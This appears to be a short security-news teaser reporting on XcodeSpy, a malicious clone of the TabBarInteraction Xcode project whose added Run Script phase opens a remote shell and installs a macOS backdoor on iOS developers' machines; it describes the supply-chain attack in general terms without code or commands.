Malicious Xcode Project XcodeSpy Targets iOS Devs In Supply-Chain Attack

XcodeSpy malware targets iOS devs and install macOS backdoor on the victim's device. Xcode is a development environment created by Apple that allows users to create apps for macOS, iOS, tvOS, and watchOS. Threat actors use Xcode to create malicious versions of popular projects hoping that they are included in other developer's applications. XcodeSpy project is a clone of the legitimate TabBarInteraction project and with a malicious 'Run Script' script added to the project, executing which opens a remote shell back to the threat actor's server. Read more...